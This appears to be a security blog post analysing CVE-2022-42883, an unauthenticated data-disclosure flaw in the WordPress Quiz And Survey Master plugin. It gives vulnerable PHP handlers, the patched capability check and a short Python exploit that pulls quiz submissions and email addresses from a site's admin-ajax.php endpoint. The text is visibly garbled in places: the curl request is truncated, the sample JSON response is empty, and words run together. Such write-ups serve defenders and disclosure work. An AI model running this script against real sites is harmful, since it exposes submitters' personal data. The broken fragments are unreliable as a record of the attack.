CVE-2022-42883 - Sensitive Information Disclosure in Quiz And Survey Master Plugin <= 7.3.10 (WordPress) – Full Analysis & Exploit Details

Posted by: SecurityExplainedAI

Introduction

WordPress is the world’s most popular CMS, so it’s a prime target for both researchers and attackers. One of the biggest plugins for creating quizzes and surveys is Quiz And Survey Master (QSM). In September 2022, a critical vulnerability was found in versions up to 7.3.10, registered as CVE-2022-42883. This flaw allows attacks to expose sensitive information such as quiz answers, email addresses, and even full survey data to unauthorized users.

In this exclusive post, you'll get an in-depth (yet simple) explanation of the bug, code examples showing the root cause, and a demonstration exploit—so you can secure your sites and better understand WordPress plugin security.

Overview of the Vulnerability

CVE-2022-42883 is a _Sensitive Information Disclosure_ vulnerability affecting Quiz And Survey Master plugin versions 7.3.10 and below.

The issue appears because access controls are missing or broken in the plugin’s AJAX handlers. Particularly, it allows unauthenticated users to retrieve quiz submissions, user emails, and responses—without needing to log in.

> Severity: HIGH  
> Affected Versions: QSM ≤ 7.3.10  
> Patched Version: 7.3.11 and above

References

- Wordfence Advisory
- NIST NVD Entry
- Plugin Changelog

The Problematic Code

The plugin registers AJAX actions for both logged-in and nonlogged-in users, but fails to verify user capabilities before returning sensitive information.

#### Example Code Snippet (source):

// qsm-ajax.php (v7.3.10)

add_action( 'wp_ajax_qsm_get_quiz_submissions', array( $this, 'get_quiz_submissions' ) );
add_action( 'wp_ajax_nopriv_qsm_get_quiz_submissions', array( $this, 'get_quiz_submissions' ) );

public function get_quiz_submissions() {
    $quiz_id = intval( $_POST['quiz_id'] );
    $submissions = $this->get_submissions( $quiz_id );

    // No authentication, no capability check!
    wp_send_json_success( $submissions );
}

What's Wrong?
This function is triggered via both logged-in and anonymous AJAX requests. There’s no check to see if the requester should see these results!

d "action=qsm_get_quiz_submissions&quiz_id=1" \

https://targetsite.com/wp-admin/admin-ajax.php

Sensitive Data Returned:

The server returns a JSON response including all quiz answers, email addresses of submitters, timestamps, etc.

`json

{

},

// ...more entries...

]

}

`

---

Below is a simple Python exploit to fetch all quiz responses from a vulnerable site

import requests

target = 'https://targetsite.com/wp-admin/admin-ajax.php'
quiz_id = 1

payload = {
    'action': 'qsm_get_quiz_submissions',
    'quiz_id': quiz_id
}

resp = requests.post(target, data=payload)
print(resp.text)

Replacetargetsite.com and quiz_id with actual values from the site you’re testing (and ONLY with permission).

Compliance risks: Violates privacy laws (GDPR, CCPA).

- Information leakage: Secrets, internal processes, future product plans may be exposed if quiz content is confidential.

The Fix in 7.3.11

The developers added capability checks and nonce verification in the patched version. Now, only authorized users can see submissions:

if( ! current_user_can( 'edit_quizzes' ) ) {
    wp_send_json_error( 'Unauthorized' );
    exit;
}

Final Thoughts

CVE-2022-42883 is a classic example of why access controls are vital in every WordPress plugin. Even small coding oversights can lead to big, embarrassing leaks.

If you use Quiz And Survey Master, upgrade now! And remember: never trust unauthenticated input—always check capabilities and permissions before showing sensitive info.

References and Further Reading

- Official Plugin Page
- Wordfence Blog on QSM Vulns
- CVE-2022-42883 on NVD
- OAuth2 and Nonce in WP AJAX

Timeline

Published on: 11/18/2022 23:15:00 UTC
Last modified on: 11/22/2022 20:39:00 UTC